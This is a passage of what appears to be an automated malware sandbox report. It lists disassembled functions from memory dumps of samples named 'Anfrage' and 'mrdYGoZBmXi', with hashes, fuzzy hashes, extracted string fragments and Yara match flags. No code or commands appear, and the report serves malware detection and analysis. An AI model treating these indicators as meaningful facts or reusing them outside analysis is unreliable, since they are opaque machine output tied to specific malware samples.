                                                                          • Opcode Fuzzy Hash: d3d43d37b355411d8dd8b650e0ff15f0fc9dc90a55824f20709df2992594deb9
                                                                          • Instruction Fuzzy Hash: 0AE1E2B6D00728DFEB21CFA9C980A8DBBF5BF48354F20452EE545A7260DB70A945CF60
                                                                          Function 3643EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: c124ef251a8caf86c7268d970f80ca118fcee0bca8621dc3fc60ee9ed4e089d8
                                                                          • Instruction ID: f4129aaec4c2f55948ae0fd0da394f0f538981e8ae3b7965090873cf5b6ebbfa
                                                                          • Opcode Fuzzy Hash: c124ef251a8caf86c7268d970f80ca118fcee0bca8621dc3fc60ee9ed4e089d8
                                                                          • Instruction Fuzzy Hash: 137136B1E023199FEF45CFA5D980A9DBBB5BF48354F24402AE905FB250D734A915CF90
                                                                          Function 3649A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: c01b10404f534bdd7d276d1e2be9975f6e28f78f4743c83cafb6f8bed308ecdc
                                                                          • Instruction ID: 831a80439a273bb537eecd1ea98e9f3ca192d8dc17eb86a5abf8ab6b996d0043
                                                                          • Opcode Fuzzy Hash: c01b10404f534bdd7d276d1e2be9975f6e28f78f4743c83cafb6f8bed308ecdc
                                                                          • Instruction Fuzzy Hash: 93517E74F50A229FEB09CE19C494A997BF5FF89364B24406DD906DB710DBB0EC82CB80
                                                                          Function 3643F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 8e126bac2e1cc59653c0bbbd67a293f13b4f1e5c5f4244803319cdff94de2227
                                                                          • Instruction ID: a47e40ff0bc3dc1befbd470a6242269e90bd409f9c7c1af3328f29a1a931b960
                                                                          • Opcode Fuzzy Hash: 8e126bac2e1cc59653c0bbbd67a293f13b4f1e5c5f4244803319cdff94de2227
                                                                          • Instruction Fuzzy Hash: 66513FB6E02319DFEB49CF95C944ACCBBB6BF48354F24802AE815BB250D734A912CF50
                                                                          Function 363F7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                          • String ID:
                                                                          • API String ID: 4281723722-0
                                                                          • Opcode ID: 974365e5f9c409d979f8eb47c6fef85c15773356bf49e40fd51d045c8bc27f59
                                                                          • Instruction ID: e6d92b6c350652a672fed9dddaec2723e77db43de25d693c2e76a7dd5be29ea1
                                                                          • Opcode Fuzzy Hash: 974365e5f9c409d979f8eb47c6fef85c15773356bf49e40fd51d045c8bc27f59
                                                                          • Instruction Fuzzy Hash: 1631E075E01628AFDF15DFA8E884A9EBBB1EB49320F20412AE511B7390DB359911CF64
                                                                          Function 363C59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: e9d358d191925e351e4b6fadd21c36c50abd2292d3cf044d12694891961f9aa8
                                                                          • Instruction ID: 226671e78c9e68097692da5dac12e565063fa114716a50ce57d5d6c415c373b1
                                                                          • Opcode Fuzzy Hash: e9d358d191925e351e4b6fadd21c36c50abd2292d3cf044d12694891961f9aa8
                                                                          • Instruction Fuzzy Hash: 51324374D44269DFEB21CF64C884BD9BBB4BF09314F1080E9E549A7241DBB4AE98CF91
                                                                          Function 36407D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: 56e3e3c8934c99c77aea83777366208b133a3da347eb8cce28c9acd8fc9a087a
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: 0891C674E002359FEB11DF65CA846AEF7AAAF443A5F60853AE854E73C0DB309941CF52
                                                                          Function 363F4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0$Flst
                                                                          • API String ID: 0-758220159
                                                                          • Opcode ID: e9e2def35a9a90df89eaa8aa8c994d07f0b51c67a0141d7a26dc4db1954959f6
                                                                          • Instruction ID: 644aa352d1040e7a0085b1cc8e961aacd84dd646c833bcfc035f62d6876ea3ae
                                                                          • Opcode Fuzzy Hash: e9e2def35a9a90df89eaa8aa8c994d07f0b51c67a0141d7a26dc4db1954959f6
                                                                          • Instruction Fuzzy Hash: C751BEB5E252548FEB12CF99C884659FBF4EF44398F24802EE0499F253EB719949CB90
                                                                          Function 363C04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • kLsE, xrefs: 363C0540
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 363C063D
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 3446177414-2547482624
                                                                          • Opcode ID: c53408a987b186aff7d6a19b48d7499571012de254ffb215995c331b921df014
                                                                          • Instruction ID: 21164d1f0666e9e9c3d1294b54a7019db338bcd14cbed6ac38cb4611523947e8
                                                                          • Opcode Fuzzy Hash: c53408a987b186aff7d6a19b48d7499571012de254ffb215995c331b921df014
                                                                          • Instruction Fuzzy Hash: 1B51ABB9954B828BD714DF75C9806D7B7E4EF84304F10483EE9AA87240E732D989CF92
                                                                          Function 3644CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 3644CFBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID: @$@4Qw@4Qw
                                                                          • API String ID: 4062629308-2383119779
                                                                          • Opcode ID: bc68a7ab3d30f51207a61e097f1693671d285061d93e075fed7607822d28d607
                                                                          • Instruction ID: 4c51d3f12c90e3ce9a385e87bdd8304be43d0c81be43527270958b7adb63cfc5
                                                                          • Opcode Fuzzy Hash: bc68a7ab3d30f51207a61e097f1693671d285061d93e075fed7607822d28d607
                                                                          • Instruction Fuzzy Hash: 26418FB6D00224DFEB12DFA5C881AADBBF9FF46714F11412AE944DB250DB74C901CB66
                                                                          Function 363BDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0$0
                                                                          • API String ID: 3446177414-203156872
                                                                          • Opcode ID: 7cb5231c6b956395caa69ff2da3653fde5c929ba1f5bdfe634aaf20225ad483d
                                                                          • Instruction ID: c4f6a3291a529ead4c59650443c430682277cbb097a90d5d939f36bae148f766
                                                                          • Opcode Fuzzy Hash: 7cb5231c6b956395caa69ff2da3653fde5c929ba1f5bdfe634aaf20225ad483d
                                                                          • Instruction Fuzzy Hash: DB415EB6A087059FD700CF29C484A16BBE5BF89354F04492EF588DB740D771E909CB96

                                                                          Executed Functions

                                                                          Function 02F963D4 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: faa198a502570947f4ff5b9cc1742438b465ea124d052233bb995913164d39fa
                                                                          • Instruction ID: b9acc7fdd9201a71b29c880276bbbfb74fa3944c81adfca0912528e243e02d62
                                                                          • Opcode Fuzzy Hash: faa198a502570947f4ff5b9cc1742438b465ea124d052233bb995913164d39fa
                                                                          • Instruction Fuzzy Hash: 03410921A082F14ED71E875D48B9678BFD29F96201F4EC2EECADA5F3E3C5548448D760
                                                                          Function 02F95C48 Relevance: 35.4, Strings: 28, Instructions: 362COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: a$&$(q$*=$0$3$<$<V$?$?$D$G$S@$S@$[$_$_;$_;$a$d$d)$e$g$i$z$z$}M$:
                                                                          • API String ID: 0-1839718326
                                                                          • Opcode ID: 693c44861fbb28e3c3c539166a9ee41a2f27655542a59619c2f226a32f16ed72
                                                                          • Instruction ID: 9c69873fe411db1c56d910fddf4cd6d6df0af2db74a0d3eba97080209d971877
                                                                          • Opcode Fuzzy Hash: 693c44861fbb28e3c3c539166a9ee41a2f27655542a59619c2f226a32f16ed72
                                                                          • Instruction Fuzzy Hash: 93229BB0E05228CBEF64CF54C994BEDBBB2BB44348F5081D9D54DAB281CBB55A89CF50
                                                                          Function 02FA3698 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$O$S$\$s
                                                                          • API String ID: 0-3854637164
                                                                          • Opcode ID: 0cb1cf025ea6dfd057a3de796b0d5cde7a632e1f63adb92d0c037c4d85a43697
                                                                          • Instruction ID: f7fb24df88101d81fecbff4554bcb967e4c630a70537c486a984d302bf64c091
                                                                          • Opcode Fuzzy Hash: 0cb1cf025ea6dfd057a3de796b0d5cde7a632e1f63adb92d0c037c4d85a43697
                                                                          • Instruction Fuzzy Hash: 895190F2D01218ABDB11EB95DC89FEEB37CEF84755F0041A9EA08A6140E7755A488FA1
                                                                          Function 02F8F12A Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: &<U
                                                                          • API String ID: 0-1753382651
                                                                          • Opcode ID: 9debaf2701227d0ddbd729c3708d013e9f66c39660f55211daa6a9d041924b74
                                                                          • Instruction ID: 5e7a05d6681dce1fec08e9226649e565ac43e6f08baae73fd6dcde4d741a1842
                                                                          • Opcode Fuzzy Hash: 9debaf2701227d0ddbd729c3708d013e9f66c39660f55211daa6a9d041924b74
                                                                          • Instruction Fuzzy Hash: 48217FB1D10219AFCB14DFADD88059EBBF8FB49720B60861BE968E7350D77099418FA0
                                                                          Function 02FB0F28 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: wv
                                                                          • API String ID: 0-2562795975
                                                                          • Opcode ID: 083f3ff36cea02128e466787160f2ac3eaac78d5123ab7a1f5c0b941f88f0899
                                                                          • Instruction ID: 75fdd3458a4bc5d7cd26e0e47f1da4fec5f181d3b3a315c638b291380bd298ca
                                                                          • Opcode Fuzzy Hash: 083f3ff36cea02128e466787160f2ac3eaac78d5123ab7a1f5c0b941f88f0899
                                                                          • Instruction Fuzzy Hash: FF11FEB6D01219AF9B04DFA9D8419EFB7F9EF48250F14426AE919E7200E7705A04CFE1
                                                                          Function 02FB1688 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: f[
                                                                          • API String ID: 0-2395428514
                                                                          • Opcode ID: 5a917c7377a6b9fcfcafaee3ff046f92a2ae6ad963ef2b866a824a4a6394be2b
                                                                          • Instruction ID: 9ae939cc964e63a47e9297f2ef832f0331e0ff26ded83d84401838e6af0f9a86
                                                                          • Opcode Fuzzy Hash: 5a917c7377a6b9fcfcafaee3ff046f92a2ae6ad963ef2b866a824a4a6394be2b
                                                                          • Instruction Fuzzy Hash: 5C11FBB6D01218AF9F00DFE9DC419EEFBF9EF48610F14456AE919E7200E7749A058FA0
                                                                          Function 02F8F189 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: &<U
                                                                          • API String ID: 0-1753382651
                                                                          • Opcode ID: d8446ba83f333980c2b60b928a33fd0dc9407a72d0bb227e44e1782f103acfdf
                                                                          • Instruction ID: 486b44632b46dda920f4e9637c963e00463b64c7d838aca9613d73f977b90309
                                                                          • Opcode Fuzzy Hash: d8446ba83f333980c2b60b928a33fd0dc9407a72d0bb227e44e1782f103acfdf
                                                                          • Instruction Fuzzy Hash: 1D11CCB1D11229AFCB40DFA9D9845DEBBF8FB49720B20865BE818E7300D77146418FD4
                                                                          Function 02F8F198 Relevance: .1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 41f6aba0c2bb097108cd39b9bfbf3f8f920ada209559beaca284a1727ec6d12a
                                                                          • Instruction ID: 112e8070131c4c999ce8b2d226156afaa3731706c8838a231a3bf16cb9f73d12
                                                                          • Opcode Fuzzy Hash: 41f6aba0c2bb097108cd39b9bfbf3f8f920ada209559beaca284a1727ec6d12a
                                                                          • Instruction Fuzzy Hash: 35411BB1D11219AFDB04DF99CC81AEEBBBCFF49750F50415AFA14E6240E7B09640CBA0
                                                                          Function 02FB4628 Relevance: .1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2df1d9b015474010a9667e1f48030d82b39e4b8a0229bf0c848740eb48d4f5bc
                                                                          • Instruction ID: 805c7744a9a8e79fd16546f6eb2d7e88826cea94bd907f431eb691f036daaf92
                                                                          • Opcode Fuzzy Hash: 2df1d9b015474010a9667e1f48030d82b39e4b8a0229bf0c848740eb48d4f5bc
                                                                          • Instruction Fuzzy Hash: 8A31D6B5A01208AFDB14DF99C840EDEB7B9EF8D700F10421AF908A7340D770A951CFA1
                                                                          Function 02FB4798 Relevance: .1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5b7998dfa1e579f5c837d53e03e5c1004f1e95ef4df3e0c3105228523c17caee
                                                                          • Instruction ID: 0352be996dc25921a346c9f509de1f315d6d34c88c9f4c5a0e38957f8f0cb708
                                                                          • Opcode Fuzzy Hash: 5b7998dfa1e579f5c837d53e03e5c1004f1e95ef4df3e0c3105228523c17caee
                                                                          • Instruction Fuzzy Hash: 3931C8B5A00608ABDB14DF99D841EDEB7B9EF89710F10421AFD18A7340D770A951CFA1
                                                                          Function 02FB4048 Relevance: .1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb0c1b01ce5099da66a73b5ad2eda38cb39fb5a100d1780c107b12b1227bbe75
                                                                          • Instruction ID: 436db0bb355c184ff8a75f4debb6625204a84f6655194bac1416e7863ae4e411
                                                                          • Opcode Fuzzy Hash: cb0c1b01ce5099da66a73b5ad2eda38cb39fb5a100d1780c107b12b1227bbe75
                                                                          • Instruction Fuzzy Hash: 6331E7B5A40609ABDB14DF99CC41EEFB7B9EF89710F10821AF918A7340D770A911CFA1
                                                                          Function 02FB49D8 Relevance: .1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7791a12eeec1f84143aefb661e5f04e36a81dda008d08096b029f3be41ca9aec
                                                                          • Instruction ID: 10d67d59021241b2dea805ed99f082f3783e7506f088b04ced4976bf7ef509b7
                                                                          • Opcode Fuzzy Hash: 7791a12eeec1f84143aefb661e5f04e36a81dda008d08096b029f3be41ca9aec
                                                                          • Instruction Fuzzy Hash: 0C211BB5A00609AFDB14DF69CC41EEFB7B9EF89710F50451AFA18A7240D770A911CFA1
                                                                          Function 02FA34D8 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d8b0bfb76eada336ab81efdeab645e9e257693934a5b21136e260867bc262bf1
                                                                          • Instruction ID: 9d84a1fada1ec47c39e1178148bbe7efca2e87c96dcb237b15b9326512783c9d
                                                                          • Opcode Fuzzy Hash: d8b0bfb76eada336ab81efdeab645e9e257693934a5b21136e260867bc262bf1
                                                                          • Instruction Fuzzy Hash: 5A1170B23802057AFB21AA5ADC42FAB775D9F85B90F244415FB08AA2C1D6A4B8114BB4
                                                                          Function 02FB0A38 Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5eeec9cfc777346254b582300f1a61b9a6ab66d76f092e47158b78ffef86e8ee
                                                                          • Instruction ID: 89020c9694660fa608e413de2f7a900287405e38309d0048c05a3202051ab279
                                                                          • Opcode Fuzzy Hash: 5eeec9cfc777346254b582300f1a61b9a6ab66d76f092e47158b78ffef86e8ee
                                                                          • Instruction Fuzzy Hash: 5611F1B6D0121CAF8B00DFA9D8419EFBBF9EF89240F00425AE919E7200E7705A048FE1
                                                                          Function 02FB3E58 Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f09dbf1768e525518426ca9d95190066fff9e435ed7d7fd0f53db1028ee2646
                                                                          • Instruction ID: 844575c2414177fd1ff15bc739d346c2a4a81381f558080750e7ba14c17a5c9f
                                                                          • Opcode Fuzzy Hash: 5f09dbf1768e525518426ca9d95190066fff9e435ed7d7fd0f53db1028ee2646
                                                                          • Instruction Fuzzy Hash: CD118EB16402086BE710EBA9CC41FEFB7ADEF89710F10454AFA04A7240D77069018BA1
                                                                          Function 02FB3CD8 Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
